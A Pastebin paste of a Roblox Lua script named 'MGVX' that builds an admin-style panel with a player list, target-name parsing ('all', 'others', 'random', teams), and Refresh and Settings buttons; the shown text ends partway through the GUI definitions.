Advertisement
Guest User

Untitled

a guest
Jan 21st, 2017
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 78.02 KB | None | 0 0
  1. print("MGVX LOADED")
  2.  
  3. local CoreValues = Instance.new("Folder")
  4. CoreValues.Name = "MGVXCore"
  5. CoreValues.Parent = game
  6.  
  7.  
  8. local Http = game:GetService("HttpService")
  9. local gWorkspace = game:GetService("Workspace")
  10. local OwnerGui = game:GetService("Players")['Jech_X'].PlayerGui
  11. local Players = game:GetService("Players")
  12. local Website = "http://mgvx.tk/"
  13.  
  14. -- Makes Sure EveryThing Goes Ok!---
  15. print("MGVX LOADED")
  16.  
  17.  
  18. --------
  19. --local WhiteList = Http:GetAsync(Website)
  20. local BlackListed = {}
  21.  
  22. -- Variables---
  23. --[[for i,v in pairs(game.Players:GetChildren()) do
  24. if string.find(WhiteList, ",") then
  25. local sep = true
  26. if string.find(WhiteList, v.UserId) then
  27. Owner = game:GetService("Players"):WaitForChild(v.Name)
  28. end
  29. end
  30. end]]
  31. Owner = game:GetService("Players")['Jech_X']
  32.  
  33. local plr = Owner
  34.  
  35. for i,v in pairs(game.Players:GetChildren())do if v.Name ~= plr then otherp = v end end
  36. for i,v in pairs(game.Players:GetChildren())do if v == plr then Owner = v end end
  37.  
  38. if Owner == nil then
  39. Owner = game.Players.LocalPlayer
  40. end
  41.  
  42. if plr == nil then
  43. plr = Owner
  44. end
  45.  
  46.  
  47. ------------Functions----------
  48. function GetPlr(plr, str)
  49. local plrz = {} str = str:lower()
  50. if str == "all" then plrz = game.Players:children()
  51. elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v) end end
  52. else
  53. local sn = {1} local en = {}
  54. for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  55. for x = 1, #sn do
  56. if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") then table.insert(plrz, plr)
  57. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") then table.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  58. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  59. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  60. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  61. end end end
  62. elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  63. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  64. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  65. end end end
  66. else
  67. for a, plyr in pairs(game.Players:children()) do
  68. if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or (sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" and plyr.Name:lower():find(str) == 1) then
  69. table.insert(plrz, plyr) break
  70. end
  71. end
  72. end
  73. end
  74. end
  75. return plrz
  76. end
  77.  
  78.  
  79. local OtherP = Instance.new("StringValue")
  80. OtherP.Name = "OtherP"
  81. OtherP.Value = otherp.Name
  82. OtherP.Parent = CoreValues
  83.  
  84. local OwnerV = Instance.new("StringValue")
  85. OwnerV.Name = "Owner"
  86. OwnerV.Value = Owner.Name
  87. OwnerV.Parent = CoreValues
  88.  
  89.  
  90.  
  91. local NewGuiPart1 = Instance.new("ScreenGui")
  92. NewGuiPart1.Name = "MGVX"
  93. NewGuiPart1.Parent = Owner.PlayerGui
  94.  
  95.  
  96.  
  97. -------
  98. local NewGuiPart2 = Instance.new("Frame")
  99. NewGuiPart2.Active = true
  100. NewGuiPart2.Position = UDim2.new(0.368000001, 0, 0.0829999968, 0)
  101. NewGuiPart2.Size = UDim2.new(0, 300, 0, 350)
  102. NewGuiPart2.Style = Enum.FrameStyle.DropShadow
  103. NewGuiPart2.ClipsDescendants = true
  104. NewGuiPart2.Draggable = true
  105. NewGuiPart2.Parent = NewGuiPart1
  106. -------
  107. local NewGuiPart3 = Instance.new("TextButton")
  108. NewGuiPart3.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  109. NewGuiPart3.BackgroundTransparency = 0.69999998807907
  110. NewGuiPart3.BorderColor3 = Color3.new(0, 0, 0)
  111. NewGuiPart3.BorderSizePixel = 0
  112. NewGuiPart3.Name = "TL1"
  113. NewGuiPart3.Position = UDim2.new(0, 200, 0, 0)
  114. NewGuiPart3.Selectable = true
  115. NewGuiPart3.Size = UDim2.new(0, 80, 0, 20)
  116. NewGuiPart3.Style = Enum.ButtonStyle.Custom
  117. NewGuiPart3.FontSize = Enum.FontSize.Size14
  118. NewGuiPart3.Text = "Refresh"
  119. NewGuiPart3.TextColor3 = Color3.new(1, 1, 1)
  120. NewGuiPart3.Parent = NewGuiPart2
  121. -------
  122. local NewGuiPart4 = Instance.new("TextLabel")
  123. NewGuiPart4.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  124. NewGuiPart4.BackgroundTransparency = 1
  125. NewGuiPart4.BorderColor3 = Color3.new(0, 0, 0)
  126. NewGuiPart4.BorderSizePixel = 0
  127. NewGuiPart4.Name = "TL2"
  128. NewGuiPart4.Position = UDim2.new(0, 50, 0, 0)
  129. NewGuiPart4.Size = UDim2.new(0, 80, 0, 20)
  130. NewGuiPart4.FontSize = Enum.FontSize.Size14
  131. NewGuiPart4.Text = "Loading..."
  132. NewGuiPart4.TextColor3 = Color3.new(1, 1, 1)
  133. NewGuiPart4.TextScaled = true
  134. NewGuiPart4.TextWrapped = true
  135. NewGuiPart4.Parent = NewGuiPart2
  136. -------
  137. local NewGuiPart5 = Instance.new("Frame")
  138. NewGuiPart5.BackgroundColor3 = Color3.new(0, 0, 0)
  139. NewGuiPart5.BackgroundTransparency = 1
  140. NewGuiPart5.BorderSizePixel = 5
  141. NewGuiPart5.Name = "Main"
  142. NewGuiPart5.Position = UDim2.new(1, -280, 0.0829999968, 0)
  143. NewGuiPart5.Size = UDim2.new(0, 250, 0, 300)
  144. NewGuiPart5.Visible = false
  145. NewGuiPart5.Draggable = true
  146. NewGuiPart5.Parent = NewGuiPart2
  147. -------
  148. local NewGuiPart6 = Instance.new("ScrollingFrame")
  149. NewGuiPart6.BackgroundTransparency = 1
  150. NewGuiPart6.Name = "PlayerList"
  151. NewGuiPart6.Position = UDim2.new(0, -7, 0, -10)
  152. NewGuiPart6.Selectable = true
  153. NewGuiPart6.Size = UDim2.new(0, 290, 0, 320)
  154. NewGuiPart6.ClipsDescendants = true
  155. NewGuiPart6.Parent = NewGuiPart5
  156. -------
  157. local NewGuiPart7 = Instance.new("Frame")
  158. NewGuiPart7.BackgroundColor3 = Color3.new(0, 0, 0)
  159. NewGuiPart7.BackgroundTransparency = 1
  160. NewGuiPart7.BorderSizePixel = 0
  161. NewGuiPart7.Size = UDim2.new(0, 290, 0, 35)
  162. NewGuiPart7.Parent = NewGuiPart6
  163. -------
  164. local NewGuiPart8 = Instance.new("ImageLabel")
  165. NewGuiPart8.Active = false
  166. NewGuiPart8.BackgroundTransparency = 1
  167. NewGuiPart8.BorderSizePixel = 0
  168. NewGuiPart8.Position = UDim2.new(0, 10, 0, 15)
  169. NewGuiPart8.Selectable = false
  170. NewGuiPart8.Size = UDim2.new(0, 65, 0, 25)
  171. NewGuiPart8.Image = "http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username=ROBLOX"
  172. NewGuiPart8.Parent = NewGuiPart7
  173. -------
  174. local NewGuiPart9 = Instance.new("TextLabel")
  175. NewGuiPart9.BackgroundTransparency = 1
  176. NewGuiPart9.BorderSizePixel = 0
  177. NewGuiPart9.Position = UDim2.new(0, 100, 0, 15)
  178. NewGuiPart9.Size = UDim2.new(0, 100, 0, 25)
  179. NewGuiPart9.Font = Enum.Font.Legacy
  180. NewGuiPart9.FontSize = Enum.FontSize.Size10
  181. NewGuiPart9.Text = ""
  182. NewGuiPart9.TextColor3 = Color3.new(1, 1, 1)
  183. NewGuiPart9.TextScaled = true
  184. NewGuiPart9.TextWrapped = true
  185. NewGuiPart9.Parent = NewGuiPart7
  186. -------
  187. local NewGuiPart10 = Instance.new("Frame")
  188. NewGuiPart10.BackgroundColor3 = Color3.new(0, 0, 0)
  189. NewGuiPart10.BackgroundTransparency = 1
  190. NewGuiPart10.BorderSizePixel = 0
  191. NewGuiPart10.Position = UDim2.new(0, 0, 0, 35)
  192. NewGuiPart10.Size = UDim2.new(0, 290, 0, 35)
  193. NewGuiPart10.Parent = NewGuiPart6
  194. -------
  195. local NewGuiPart11 = Instance.new("ImageLabel")
  196. NewGuiPart11.Active = false
  197. NewGuiPart11.BackgroundTransparency = 1
  198. NewGuiPart11.BorderSizePixel = 0
  199. NewGuiPart11.Position = UDim2.new(0, 10, 0, 15)
  200. NewGuiPart11.Selectable = false
  201. NewGuiPart11.Size = UDim2.new(0, 65, 0, 25)
  202. NewGuiPart11.Image = ""
  203. NewGuiPart11.Parent = NewGuiPart10
  204. -------
  205. local NewGuiPart12 = Instance.new("TextLabel")
  206. NewGuiPart12.BackgroundTransparency = 1
  207. NewGuiPart12.BorderSizePixel = 0
  208. NewGuiPart12.Position = UDim2.new(0, 100, 0, 15)
  209. NewGuiPart12.Size = UDim2.new(0, 100, 0, 25)
  210. NewGuiPart12.Font = Enum.Font.Legacy
  211. NewGuiPart12.FontSize = Enum.FontSize.Size10
  212. NewGuiPart12.Text = ""
  213. NewGuiPart12.TextColor3 = Color3.new(1, 1, 1)
  214. NewGuiPart12.TextScaled = true
  215. NewGuiPart12.TextWrapped = true
  216. NewGuiPart12.Parent = NewGuiPart10
  217. -------
  218. local NewGuiPart13 = Instance.new("Frame")
  219. NewGuiPart13.BackgroundColor3 = Color3.new(0, 0, 0)
  220. NewGuiPart13.BackgroundTransparency = 1
  221. NewGuiPart13.BorderSizePixel = 0
  222. NewGuiPart13.Position = UDim2.new(0, 0, 0, 70)
  223. NewGuiPart13.Size = UDim2.new(0, 290, 0, 35)
  224. NewGuiPart13.Parent = NewGuiPart6
  225. -------
  226. local NewGuiPart14 = Instance.new("ImageLabel")
  227. NewGuiPart14.Active = false
  228. NewGuiPart14.BackgroundTransparency = 1
  229. NewGuiPart14.BorderSizePixel = 0
  230. NewGuiPart14.Position = UDim2.new(0, 10, 0, 15)
  231. NewGuiPart14.Selectable = false
  232. NewGuiPart14.Size = UDim2.new(0, 65, 0, 25)
  233. NewGuiPart14.Image = ""
  234. NewGuiPart14.Image = ""
  235. NewGuiPart14.Parent = NewGuiPart13
  236. -------
  237. local NewGuiPart15 = Instance.new("TextLabel")
  238. NewGuiPart15.BackgroundTransparency = 1
  239. NewGuiPart15.BorderSizePixel = 0
  240. NewGuiPart15.Position = UDim2.new(0, 100, 0, 15)
  241. NewGuiPart15.Size = UDim2.new(0, 100, 0, 25)
  242. NewGuiPart15.Font = Enum.Font.Legacy
  243. NewGuiPart15.FontSize = Enum.FontSize.Size10
  244. NewGuiPart15.Text = ""
  245. NewGuiPart15.TextColor3 = Color3.new(1, 1, 1)
  246. NewGuiPart15.TextScaled = true
  247. NewGuiPart15.TextWrapped = true
  248. NewGuiPart15.Parent = NewGuiPart13
  249. -------
  250. local NewGuiPart16 = Instance.new("Frame")
  251. NewGuiPart16.BackgroundColor3 = Color3.new(0, 0, 0)
  252. NewGuiPart16.BackgroundTransparency = 1
  253. NewGuiPart16.BorderSizePixel = 0
  254. NewGuiPart16.Position = UDim2.new(0, 0, 0, 105)
  255. NewGuiPart16.Size = UDim2.new(0, 290, 0, 35)
  256. NewGuiPart16.Parent = NewGuiPart6
  257. -------
  258. local NewGuiPart17 = Instance.new("ImageLabel")
  259. NewGuiPart17.Active = false
  260. NewGuiPart17.BackgroundTransparency = 1
  261. NewGuiPart17.BorderSizePixel = 0
  262. NewGuiPart17.Position = UDim2.new(0, 10, 0, 15)
  263. NewGuiPart17.Selectable = false
  264. NewGuiPart17.Size = UDim2.new(0, 65, 0, 25)
  265. NewGuiPart17.Image = ""
  266. NewGuiPart17.Image = ""
  267. NewGuiPart17.Parent = NewGuiPart16
  268. -------
  269. local NewGuiPart18 = Instance.new("TextLabel")
  270. NewGuiPart18.BackgroundTransparency = 1
  271. NewGuiPart18.BorderSizePixel = 0
  272. NewGuiPart18.Position = UDim2.new(0, 100, 0, 15)
  273. NewGuiPart18.Size = UDim2.new(0, 100, 0, 25)
  274. NewGuiPart18.Font = Enum.Font.Legacy
  275. NewGuiPart18.FontSize = Enum.FontSize.Size10
  276. NewGuiPart18.Text = ""
  277. NewGuiPart18.TextColor3 = Color3.new(1, 1, 1)
  278. NewGuiPart18.TextScaled = true
  279. NewGuiPart18.TextWrapped = true
  280. NewGuiPart18.Parent = NewGuiPart16
  281. -------
  282. local NewGuiPart19 = Instance.new("Frame")
  283. NewGuiPart19.BackgroundColor3 = Color3.new(0, 0, 0)
  284. NewGuiPart19.BackgroundTransparency = 1
  285. NewGuiPart19.BorderSizePixel = 0
  286. NewGuiPart19.Position = UDim2.new(0, 0, 0, 140)
  287. NewGuiPart19.Size = UDim2.new(0, 290, 0, 35)
  288. NewGuiPart19.Parent = NewGuiPart6
  289. -------
  290. local NewGuiPart20 = Instance.new("ImageLabel")
  291. NewGuiPart20.Active = false
  292. NewGuiPart20.BackgroundTransparency = 1
  293. NewGuiPart20.BorderSizePixel = 0
  294. NewGuiPart20.Position = UDim2.new(0, 10, 0, 15)
  295. NewGuiPart20.Selectable = false
  296. NewGuiPart20.Size = UDim2.new(0, 65, 0, 25)
  297. NewGuiPart20.Image = ""
  298. NewGuiPart20.Image = ""
  299. NewGuiPart20.Parent = NewGuiPart19
  300. -------
  301. local NewGuiPart21 = Instance.new("TextLabel")
  302. NewGuiPart21.BackgroundTransparency = 1
  303. NewGuiPart21.BorderSizePixel = 0
  304. NewGuiPart21.Position = UDim2.new(0, 100, 0, 15)
  305. NewGuiPart21.Size = UDim2.new(0, 100, 0, 25)
  306. NewGuiPart21.Font = Enum.Font.Legacy
  307. NewGuiPart21.FontSize = Enum.FontSize.Size10
  308. NewGuiPart21.Text = ""
  309. NewGuiPart21.TextColor3 = Color3.new(1, 1, 1)
  310. NewGuiPart21.TextScaled = true
  311. NewGuiPart21.TextWrapped = true
  312. NewGuiPart21.Parent = NewGuiPart19
  313. -------
  314. local NewGuiPart22 = Instance.new("Frame")
  315. NewGuiPart22.BackgroundColor3 = Color3.new(0, 0, 0)
  316. NewGuiPart22.BackgroundTransparency = 1
  317. NewGuiPart22.BorderSizePixel = 0
  318. NewGuiPart22.Position = UDim2.new(0, 0, 0, 175)
  319. NewGuiPart22.Size = UDim2.new(0, 290, 0, 35)
  320. NewGuiPart22.Parent = NewGuiPart6
  321. -------
  322. local NewGuiPart23 = Instance.new("ImageLabel")
  323. NewGuiPart23.Active = false
  324. NewGuiPart23.BackgroundTransparency = 1
  325. NewGuiPart23.BorderSizePixel = 0
  326. NewGuiPart23.Position = UDim2.new(0, 10, 0, 15)
  327. NewGuiPart23.Selectable = false
  328. NewGuiPart23.Size = UDim2.new(0, 65, 0, 25)
  329. NewGuiPart23.Image = ""
  330. NewGuiPart23.Image = ""
  331. NewGuiPart23.Parent = NewGuiPart22
  332. -------
  333. local NewGuiPart24 = Instance.new("TextLabel")
  334. NewGuiPart24.BackgroundTransparency = 1
  335. NewGuiPart24.BorderSizePixel = 0
  336. NewGuiPart24.Position = UDim2.new(0, 100, 0, 15)
  337. NewGuiPart24.Size = UDim2.new(0, 100, 0, 25)
  338. NewGuiPart24.Font = Enum.Font.Legacy
  339. NewGuiPart24.FontSize = Enum.FontSize.Size10
  340. NewGuiPart24.Text = ""
  341. NewGuiPart24.TextColor3 = Color3.new(1, 1, 1)
  342. NewGuiPart24.TextScaled = true
  343. NewGuiPart24.TextWrapped = true
  344. NewGuiPart24.Parent = NewGuiPart22
  345. -------
  346. local NewGuiPart25 = Instance.new("Frame")
  347. NewGuiPart25.BackgroundColor3 = Color3.new(0, 0, 0)
  348. NewGuiPart25.BackgroundTransparency = 1
  349. NewGuiPart25.BorderSizePixel = 0
  350. NewGuiPart25.Position = UDim2.new(0, 0, 0, 205)
  351. NewGuiPart25.Size = UDim2.new(0, 290, 0, 35)
  352. NewGuiPart25.Parent = NewGuiPart6
  353. -------
  354. local NewGuiPart26 = Instance.new("ImageLabel")
  355. NewGuiPart26.Active = false
  356. NewGuiPart26.BackgroundTransparency = 1
  357. NewGuiPart26.BorderSizePixel = 0
  358. NewGuiPart26.Position = UDim2.new(0, 10, 0, 15)
  359. NewGuiPart26.Selectable = false
  360. NewGuiPart26.Size = UDim2.new(0, 65, 0, 25)
  361. NewGuiPart26.Image = ""
  362. NewGuiPart26.Image = ""
  363. NewGuiPart26.Parent = NewGuiPart25
  364. -------
  365. local NewGuiPart27 = Instance.new("TextLabel")
  366. NewGuiPart27.BackgroundTransparency = 1
  367. NewGuiPart27.BorderSizePixel = 0
  368. NewGuiPart27.Position = UDim2.new(0, 100, 0, 15)
  369. NewGuiPart27.Size = UDim2.new(0, 100, 0, 25)
  370. NewGuiPart27.Font = Enum.Font.Legacy
  371. NewGuiPart27.FontSize = Enum.FontSize.Size10
  372. NewGuiPart27.Text = ""
  373. NewGuiPart27.TextColor3 = Color3.new(1, 1, 1)
  374. NewGuiPart27.TextScaled = true
  375. NewGuiPart27.TextWrapped = true
  376. NewGuiPart27.Parent = NewGuiPart25
  377. -------
  378. local NewGuiPart28 = Instance.new("Frame")
  379. NewGuiPart28.BackgroundColor3 = Color3.new(0, 0, 0)
  380. NewGuiPart28.BackgroundTransparency = 1
  381. NewGuiPart28.BorderSizePixel = 0
  382. NewGuiPart28.Position = UDim2.new(0, 0, 0, 240)
  383. NewGuiPart28.Size = UDim2.new(0, 290, 0, 35)
  384. NewGuiPart28.Parent = NewGuiPart6
  385. -------
  386. local NewGuiPart29 = Instance.new("ImageLabel")
  387. NewGuiPart29.Active = false
  388. NewGuiPart29.BackgroundTransparency = 1
  389. NewGuiPart29.BorderSizePixel = 0
  390. NewGuiPart29.Position = UDim2.new(0, 10, 0, 15)
  391. NewGuiPart29.Selectable = false
  392. NewGuiPart29.Size = UDim2.new(0, 65, 0, 25)
  393. NewGuiPart29.Image = ""
  394. NewGuiPart29.Image = ""
  395. NewGuiPart29.Parent = NewGuiPart28
  396. -------
  397. local NewGuiPart30 = Instance.new("TextLabel")
  398. NewGuiPart30.BackgroundTransparency = 1
  399. NewGuiPart30.BorderSizePixel = 0
  400. NewGuiPart30.Position = UDim2.new(0, 100, 0, 15)
  401. NewGuiPart30.Size = UDim2.new(0, 100, 0, 25)
  402. NewGuiPart30.Font = Enum.Font.Legacy
  403. NewGuiPart30.FontSize = Enum.FontSize.Size10
  404. NewGuiPart30.Text = ""
  405. NewGuiPart30.TextColor3 = Color3.new(1, 1, 1)
  406. NewGuiPart30.TextScaled = true
  407. NewGuiPart30.TextWrapped = true
  408. NewGuiPart30.Parent = NewGuiPart28
  409. -------
  410. local NewGuiPart31 = Instance.new("Frame")
  411. NewGuiPart31.BackgroundColor3 = Color3.new(0, 0, 0)
  412. NewGuiPart31.BackgroundTransparency = 1
  413. NewGuiPart31.BorderSizePixel = 0
  414. NewGuiPart31.Position = UDim2.new(0, 0, 0, 275)
  415. NewGuiPart31.Size = UDim2.new(0, 290, 0, 35)
  416. NewGuiPart31.Parent = NewGuiPart6
  417. -------
  418. local NewGuiPart32 = Instance.new("ImageLabel")
  419. NewGuiPart32.Active = false
  420. NewGuiPart32.BackgroundTransparency = 1
  421. NewGuiPart32.BorderSizePixel = 0
  422. NewGuiPart32.Position = UDim2.new(0, 10, 0, 15)
  423. NewGuiPart32.Selectable = false
  424. NewGuiPart32.Size = UDim2.new(0, 65, 0, 25)
  425. NewGuiPart32.Image = ""
  426. NewGuiPart32.Image = ""
  427. NewGuiPart32.Parent = NewGuiPart31
  428. -------
  429. local NewGuiPart33 = Instance.new("TextLabel")
  430. NewGuiPart33.BackgroundTransparency = 1
  431. NewGuiPart33.BorderSizePixel = 0
  432. NewGuiPart33.Position = UDim2.new(0, 100, 0, 15)
  433. NewGuiPart33.Size = UDim2.new(0, 100, 0, 25)
  434. NewGuiPart33.Font = Enum.Font.Legacy
  435. NewGuiPart33.FontSize = Enum.FontSize.Size10
  436. NewGuiPart33.Text = ""
  437. NewGuiPart33.TextColor3 = Color3.new(1, 1, 1)
  438. NewGuiPart33.TextScaled = true
  439. NewGuiPart33.TextWrapped = true
  440. NewGuiPart33.Parent = NewGuiPart31
  441. -------
  442. local NewGuiPart34 = Instance.new("Frame")
  443. NewGuiPart34.BackgroundColor3 = Color3.new(0, 0, 0)
  444. NewGuiPart34.BackgroundTransparency = 1
  445. NewGuiPart34.BorderSizePixel = 0
  446. NewGuiPart34.Position = UDim2.new(0, 0, 0, 305)
  447. NewGuiPart34.Size = UDim2.new(0, 290, 0, 35)
  448. NewGuiPart34.Parent = NewGuiPart6
  449. -------
  450. local NewGuiPart35 = Instance.new("ImageLabel")
  451. NewGuiPart35.Active = false
  452. NewGuiPart35.BackgroundTransparency = 1
  453. NewGuiPart35.BorderSizePixel = 0
  454. NewGuiPart35.Position = UDim2.new(0, 10, 0, 15)
  455. NewGuiPart35.Selectable = false
  456. NewGuiPart35.Size = UDim2.new(0, 65, 0, 25)
  457. NewGuiPart35.Image = ""
  458. NewGuiPart35.Image = ""
  459. NewGuiPart35.Parent = NewGuiPart34
  460. -------
  461. local NewGuiPart36 = Instance.new("TextLabel")
  462. NewGuiPart36.BackgroundTransparency = 1
  463. NewGuiPart36.BorderSizePixel = 0
  464. NewGuiPart36.Position = UDim2.new(0, 100, 0, 15)
  465. NewGuiPart36.Size = UDim2.new(0, 100, 0, 25)
  466. NewGuiPart36.Font = Enum.Font.Legacy
  467. NewGuiPart36.FontSize = Enum.FontSize.Size10
  468. NewGuiPart36.Text = ""
  469. NewGuiPart36.TextColor3 = Color3.new(1, 1, 1)
  470. NewGuiPart36.TextScaled = true
  471. NewGuiPart36.TextWrapped = true
  472. NewGuiPart36.Parent = NewGuiPart34
  473. -------
  474. local NewGuiPart37 = Instance.new("Frame")
  475. NewGuiPart37.BackgroundColor3 = Color3.new(0, 0, 0)
  476. NewGuiPart37.BackgroundTransparency = 1
  477. NewGuiPart37.BorderSizePixel = 0
  478. NewGuiPart37.Position = UDim2.new(0, 0, 0, 345)
  479. NewGuiPart37.Size = UDim2.new(0, 290, 0, 35)
  480. NewGuiPart37.Parent = NewGuiPart6
  481. -------
  482. local NewGuiPart38 = Instance.new("ImageLabel")
  483. NewGuiPart38.Active = false
  484. NewGuiPart38.BackgroundTransparency = 1
  485. NewGuiPart38.BorderSizePixel = 0
  486. NewGuiPart38.Position = UDim2.new(0, 10, 0, 15)
  487. NewGuiPart38.Selectable = false
  488. NewGuiPart38.Size = UDim2.new(0, 65, 0, 25)
  489. NewGuiPart38.Image = ""
  490. NewGuiPart38.Image = ""
  491. NewGuiPart38.Parent = NewGuiPart37
  492. -------
  493. local NewGuiPart39 = Instance.new("TextLabel")
  494. NewGuiPart39.BackgroundTransparency = 1
  495. NewGuiPart39.BorderSizePixel = 0
  496. NewGuiPart39.Position = UDim2.new(0, 100, 0, 15)
  497. NewGuiPart39.Size = UDim2.new(0, 100, 0, 25)
  498. NewGuiPart39.Font = Enum.Font.Legacy
  499. NewGuiPart39.FontSize = Enum.FontSize.Size10
  500. NewGuiPart39.Text = ""
  501. NewGuiPart39.TextColor3 = Color3.new(1, 1, 1)
  502. NewGuiPart39.TextScaled = true
  503. NewGuiPart39.TextWrapped = true
  504. NewGuiPart39.Parent = NewGuiPart37
  505. -------
  506. local NewGuiPart40 = Instance.new("Frame")
  507. NewGuiPart40.BackgroundColor3 = Color3.new(0, 0, 0)
  508. NewGuiPart40.BackgroundTransparency = 1
  509. NewGuiPart40.BorderSizePixel = 0
  510. NewGuiPart40.Position = UDim2.new(0, 0, 0, 375)
  511. NewGuiPart40.Size = UDim2.new(0, 290, 0, 35)
  512. NewGuiPart40.Parent = NewGuiPart6
  513. -------
  514. local NewGuiPart41 = Instance.new("ImageLabel")
  515. NewGuiPart41.Active = false
  516. NewGuiPart41.BackgroundTransparency = 1
  517. NewGuiPart41.BorderSizePixel = 0
  518. NewGuiPart41.Position = UDim2.new(0, 10, 0, 15)
  519. NewGuiPart41.Selectable = false
  520. NewGuiPart41.Size = UDim2.new(0, 65, 0, 25)
  521. NewGuiPart41.Image = ""
  522. NewGuiPart41.Image = ""
  523. NewGuiPart41.Parent = NewGuiPart40
  524. -------
  525. local NewGuiPart42 = Instance.new("TextLabel")
  526. NewGuiPart42.BackgroundTransparency = 1
  527. NewGuiPart42.BorderSizePixel = 0
  528. NewGuiPart42.Position = UDim2.new(0, 100, 0, 15)
  529. NewGuiPart42.Size = UDim2.new(0, 100, 0, 25)
  530. NewGuiPart42.Font = Enum.Font.Legacy
  531. NewGuiPart42.FontSize = Enum.FontSize.Size10
  532. NewGuiPart42.Text = ""
  533. NewGuiPart42.TextColor3 = Color3.new(1, 1, 1)
  534. NewGuiPart42.TextScaled = true
  535. NewGuiPart42.TextWrapped = true
  536. NewGuiPart42.Parent = NewGuiPart40
  537. -------
  538. local NewGuiPart43 = Instance.new("Frame")
  539. NewGuiPart43.BackgroundColor3 = Color3.new(0, 0, 0)
  540. NewGuiPart43.BackgroundTransparency = 1
  541. NewGuiPart43.BorderSizePixel = 0
  542. NewGuiPart43.Position = UDim2.new(0, 0, 0, 405)
  543. NewGuiPart43.Size = UDim2.new(0, 290, 0, 35)
  544. NewGuiPart43.Parent = NewGuiPart6
  545. -------
  546. local NewGuiPart44 = Instance.new("ImageLabel")
  547. NewGuiPart44.Active = false
  548. NewGuiPart44.BackgroundTransparency = 1
  549. NewGuiPart44.BorderSizePixel = 0
  550. NewGuiPart44.Position = UDim2.new(0, 10, 0, 15)
  551. NewGuiPart44.Selectable = false
  552. NewGuiPart44.Size = UDim2.new(0, 65, 0, 25)
  553. NewGuiPart44.Image = ""
  554. NewGuiPart44.Image = ""
  555. NewGuiPart44.Parent = NewGuiPart43
  556. -------
  557. local NewGuiPart45 = Instance.new("TextLabel")
  558. NewGuiPart45.BackgroundTransparency = 1
  559. NewGuiPart45.BorderSizePixel = 0
  560. NewGuiPart45.Position = UDim2.new(0, 100, 0, 15)
  561. NewGuiPart45.Size = UDim2.new(0, 100, 0, 25)
  562. NewGuiPart45.Font = Enum.Font.Legacy
  563. NewGuiPart45.FontSize = Enum.FontSize.Size10
  564. NewGuiPart45.Text = ""
  565. NewGuiPart45.TextColor3 = Color3.new(1, 1, 1)
  566. NewGuiPart45.TextScaled = true
  567. NewGuiPart45.TextWrapped = true
  568. NewGuiPart45.Parent = NewGuiPart43
  569. -------
  570. local NewGuiPart46 = Instance.new("Frame")
  571. NewGuiPart46.BackgroundColor3 = Color3.new(0, 0, 0)
  572. NewGuiPart46.BackgroundTransparency = 1
  573. NewGuiPart46.BorderSizePixel = 0
  574. NewGuiPart46.Position = UDim2.new(0, 0, 0, 445)
  575. NewGuiPart46.Size = UDim2.new(0, 290, 0, 35)
  576. NewGuiPart46.Parent = NewGuiPart6
  577. -------
  578. local NewGuiPart47 = Instance.new("ImageLabel")
  579. NewGuiPart47.Active = false
  580. NewGuiPart47.BackgroundTransparency = 1
  581. NewGuiPart47.BorderSizePixel = 0
  582. NewGuiPart47.Position = UDim2.new(0, 10, 0, 15)
  583. NewGuiPart47.Selectable = false
  584. NewGuiPart47.Size = UDim2.new(0, 65, 0, 25)
  585. NewGuiPart47.Image = ""
  586. NewGuiPart47.Image = ""
  587. NewGuiPart47.Parent = NewGuiPart46
  588. -------
  589. local NewGuiPart48 = Instance.new("TextLabel")
  590. NewGuiPart48.BackgroundTransparency = 1
  591. NewGuiPart48.BorderSizePixel = 0
  592. NewGuiPart48.Position = UDim2.new(0, 100, 0, 15)
  593. NewGuiPart48.Size = UDim2.new(0, 100, 0, 25)
  594. NewGuiPart48.Font = Enum.Font.Legacy
  595. NewGuiPart48.FontSize = Enum.FontSize.Size10
  596. NewGuiPart48.Text = ""
  597. NewGuiPart48.TextColor3 = Color3.new(1, 1, 1)
  598. NewGuiPart48.TextScaled = true
  599. NewGuiPart48.TextWrapped = true
  600. NewGuiPart48.Parent = NewGuiPart46
  601. -------
  602. local NewGuiPart49 = Instance.new("TextButton")
  603. NewGuiPart49.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  604. NewGuiPart49.BackgroundTransparency = 0.69999998807907
  605. NewGuiPart49.BorderColor3 = Color3.new(0, 0, 0)
  606. NewGuiPart49.BorderSizePixel = 0
  607. NewGuiPart49.Name = "TL3"
  608. NewGuiPart49.Position = UDim2.new(0, 200, 0, 25)
  609. NewGuiPart49.Selectable = true
  610. NewGuiPart49.Size = UDim2.new(0, 80, 0, 20)
  611. NewGuiPart49.Style = Enum.ButtonStyle.Custom
  612. NewGuiPart49.FontSize = Enum.FontSize.Size14
  613. NewGuiPart49.Text = "Settings"
  614. NewGuiPart49.TextColor3 = Color3.new(1, 1, 1)
  615. NewGuiPart49.Parent = NewGuiPart2
  616. -------
  617. local NewGuiPart50 = Instance.new("Frame")
  618. NewGuiPart50.BackgroundTransparency = 1
